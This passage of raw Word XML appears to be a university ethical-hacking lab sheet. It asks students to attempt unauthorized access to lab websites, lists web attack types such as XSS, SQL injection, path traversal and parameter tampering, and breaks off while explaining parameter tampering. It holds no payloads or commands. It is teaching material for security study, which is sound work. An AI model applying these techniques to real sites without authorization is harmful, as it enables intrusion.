        <w:t>(If recording in the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="E46C0A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="E46C0A"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>coursework, DONOT UPLOAD IN OneNote Collaboration Space)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AA9CB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="57"/>
        <w:ind w:left="840"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>If any errors in execution, troubleshoot and record it in your OneNotebook Shared</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06908559" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="839"/>
          <w:tab w:val="left" w:pos="11313"/>
        </w:tabs>
        <w:ind w:left="485" w:right="-15"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
        <w:t>space. (Make sure you specify your name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-21"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>there)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71586E70" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6891A6FC" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="82"/>
        <w:ind w:left="4980"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C00BC1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1434"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>As a continuation process from our Task 1, where we have gathered information related to websites/ servers, we shall try and make an attempt to gain unauthorized access to the website and its applications/ data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008FCEC6" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FC255F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>As discussed during our lecture sessions, w</w:t>
      </w:r>
      <w:r>
        <w:t>ebsites are links (URLs) which are used to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>applications)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>webservers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>exchange the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Internet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>applications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>gain access into the organisation. The web application attack could be done by exploiting via http.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F328422" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2003CA6F" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="840" w:right="1436"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Insecure communications, Cross site scripting (XSS), SQL Injection, Cross site request forgeries are few of them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C79B763" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747D35DA" w14:textId="3E38E4F5" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="92"/>
        <w:ind w:left="1200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15737344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4789F0DC" wp14:editId="0D2421FF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1371600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>55245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5029200" cy="1056640"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="45"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9200" cy="1056640"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="DADAD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BF583F6" w14:textId="0E2456EF" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>List out the other methods of web app</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>lication attacks:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2327C29A" w14:textId="47615521" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="136751F9" w14:textId="00EAED5C" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Path Traversal</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4FA085DD" w14:textId="7BC8E21F" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Distributed Denial of Service</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6497B738" w14:textId="2E8137AE" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Local File Inclusion</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="55524420" w14:textId="77777777" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                            <w:pPr>
                              <w:spacing w:before="5"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="24"/>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789F0DC" id="Text Box 30" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:108pt;margin-top:4.35pt;width:396pt;height:83.2pt;z-index:157373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0xAgIAAOkDAAAOAAAAZHJzL2Uyb0RvYy54bWysU9GO0zAQfEfiHyy/06TlWkHU9FRaHUI6&#10;OKQ7PsBxnMTC8Zq126R8PWun7Z2ON4QiWev1ejwzu1nfjr1hR4Vegy35fJZzpqyEWtu25D+e7t59&#10;4MwHYWthwKqSn5Tnt5u3b9aDK9QCOjC1QkYg1heDK3kXgiuyzMtO9cLPwClLhw1gLwJtsc1qFAOh&#10;9yZb5PkqGwBrhyCV95TdT4d8k/CbRsnw0DReBWZKTtxCWjGtVVyzzVoULQrXaXmmIf6BRS+0pUev&#10;UHsRBDug/guq1xLBQxNmEvoMmkZLlTSQmnn+Ss1jJ5xKWsgc7642+f8HK78dvyPTdclvlpxZ0VOP&#10;ntQY2CcY2fvkz+B8QWWPjgrDSHnqc9Lq3T3In55Z2HXCtmqLCEOnRE385tHZ7MXV2BFf+AhSDV+h&#10;pnfEIUACGhvso3lkByN06tPp2pvIRVJymS8+UsM5k3Q2z5er1U1il4nict2hD58V9CwGJUdqfoIX&#10;x3sfIh1RXEriax6Mru+0MWmDbbUzyI6CBmW/jV9S8KrM2FhsIV6bEGMm6YzSJpFhrMZkaTIhyq6g&#10;PpFwhGn+6H+hoAP8zdlAs1dy/+sgUHFmvlgyLw7qJcBLUF0CYSVdLXngbAp3YRrog0PddoQ8tcfC&#10;lgxudJL+zOJMl+YpOXKe/TiwL/ep6vkP3fwBAAD//wMAUEsDBBQABgAIAAAAIQD9CcKc3wAAAAoB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BT8MwDIXvSPyHyEhcEEs7ia0qTScE4oYEDJC2W9Z4bbXG&#10;KUm2lH+Pd4Kb7We9971qNdlBnNCH3pGCfJaBQGqc6alV8PnxfFuACFGT0YMjVPCDAVb15UWlS+MS&#10;veNpHVvBJhRKraCLcSylDE2HVoeZG5FY2ztvdeTVt9J4ndjcDnKeZQtpdU+c0OkRHztsDuuj5dxt&#10;yr9vDq9fxfiU0OPLm9zsk1LXV9PDPYiIU/x7hjM+o0PNTDt3JBPEoGCeL7hLVFAsQZz1LCv4sONp&#10;eZeDrCv5v0L9CwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFzj/TECAgAA6QMAAA4AAAAA&#10;AAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAP0JwpzfAAAACgEAAA8A&#10;AAAAAAAAAAAAAAAAXAQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAABoBQAAAAA=&#10;" fillcolor="#dadada" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4BF583F6" w14:textId="0E2456EF" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>List out the other methods of web app</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>lication attacks:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2327C29A" w14:textId="47615521" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="136751F9" w14:textId="00EAED5C" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Path Traversal</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4FA085DD" w14:textId="7BC8E21F" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Distributed Denial of Service</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6497B738" w14:textId="2E8137AE" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Local File Inclusion</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="55524420" w14:textId="77777777" w:rsidR="007D4EEB" w:rsidRDefault="007D4EEB">
                      <w:pPr>
                        <w:spacing w:before="5"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:t>1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287EF79" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FAB16D" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33756C7B" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ACF78E9" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445E4E66" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F26B08" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F00F2CA" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="026F03FB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:spacing w:before="92"/>
        <w:ind w:left="839" w:right="1616"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Note: Any web application attacks could be performed (of your own choice) and vulnerabilities could be identified among the given websites for our lab enviroment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F86A6E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1017EB49" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1444"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Attacks: </w:t>
      </w:r>
      <w:r>
        <w:t>Cross-site scripting, Username and Password enumeration, Stored Cross- site scripting, Parameter Tampering, Exploiting WordPress plugin vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA1A87" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C859B4" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="839"/>
      </w:pPr>
      <w:r>
        <w:t>Demonstration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59260BC2" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1435"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Parameter Tampering is a type of attack which is executed by manipulating the parameter</w:t>
      </w:r>
      <w:r>
        <w:t>s which are exchanged between the clients and the servers. (Something like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>names,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>passwords,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rights,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>roles,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quantity,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>quality</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Example, the quantity of items purchased or the price of the product might to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tampered).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DEDC1" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB6BFDB" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="839" w:right="1433"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>att</w:t>
      </w:r>
      <w:r>
        <w:t>ack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>happen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>understanding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
